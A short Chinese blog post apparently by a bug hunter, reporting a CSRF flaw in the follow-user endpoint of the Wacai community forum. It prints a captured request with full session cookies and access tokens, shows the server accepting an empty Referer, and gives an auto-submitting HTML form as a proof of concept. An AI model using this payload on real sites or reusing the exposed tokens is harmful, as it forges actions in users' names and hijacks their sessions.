麦秋记

· 随写 · ·

一次忽略的csrf漏洞

在挖财漏洞时候,看到社区有关注功能,想想测试一下有没有csrf

1.png

分析请求包看到

POST /web/api2/follow/add HTTP/1.1
Host: bbs.wacai.com
Connection: close
Content-Length: 11
Accept: application/json, text/plain, */*
Origin: https://bbs.wacai.com
x-requested-with: XMLHttpRequest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: 
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: _jzqa=1.730756309610637800.
1559026364.1559026364.1559026364.1; 
_jzqc=1; _jzqckmp=1; 
Hm_lvt_0311e2d8c20d5428ab91f7c14ba1be08=1559026364;
 JSESSIONID=F6C1E5169FB386C74E06CC8DF0209BCF;
  sajssdk_2015_cross_new_user=1;
   __lsd_did__=76e4956a50e74d6bfc598b33c65fd079; 
   wctk=WCeO2k48oDZrB9BPYLKsjilV6feWBqobvSNwQ;
    wctk.sig=Fz7T2rfrGmqANvme8V_VKae06jQ; 
    access_token=WCeO2k48oDZrB9BPYLKsjilV6feWBqobvSNwQ; 
    access_token.sig=swxHsDm9M_QBVnZb6K5nmKEQdhQ; 
    Hm_lvt_bc65f2f4ddfe3a1cda888f512e73f7f1=1559026827,1559026864; 
    sensorsdata2015jssdkcross=%
    7B%22distinct_id%22%3A%2216afd3685a0458-0e50e32cb8d3c4-37657e
    04-1296000-16afd3685a1aa3%22%2C%22%24device_id%22%3A%2216afd3685a045
    8-0e50e32cb8d3c4-37657e04-1296000-16afd3685a1aa3%22%2C%22props%22%3A%7B%2
    2%24latest_referrer%22%3A%22%22%2C%22%24latest_referrer_host%22%3A%22%22
    %2C%22%24latest_traffic_source_type%22%3A%22%E7%9B%B4%E6%8E%A5%E6%B5%81%E9%87%8
    F%22%2C%22%24latest_search_keyword%22%3A%22%E6%9C%AA%E5%8F%96%E5%88%B0%E5%80%BC
    _%E7%9B%B4%E6%8E%A5%E6%89%93%E5%BC%80%22%7D%7D; refresh_token=""; 
    _jzqb=1.6.10.1559026364.1; Hm_lpvt_0311e2d8c20d5428ab91f7c14ba1be08=1559027090;
     Hm_lpvt_bc65f2f4ddfe3a1cda888f512e73f7f1=1559027120

uid=2517471

我把referer 内容清空依然可以关注用户

HTTP/1.1 200 OK
Server: Safe3waf/2.3.5
Date: Tue, 28 May 2019 07:07:10 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 45
Connection: close
X-XSS-Protection: 1; mode=block
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Expires: 0

{"code":4003,"error":"已经关注该用户"}

贴出payload

<html>

<body>

<form id="csrf" name="csrf" action="/web/api2/follow/add" method="POST">

<input type="text" name="uid" value="111111/>

<input type="submit" value="submit" />

</form>

<script>

	document.csrf.submit();

</script>

</body>

</html>


评论0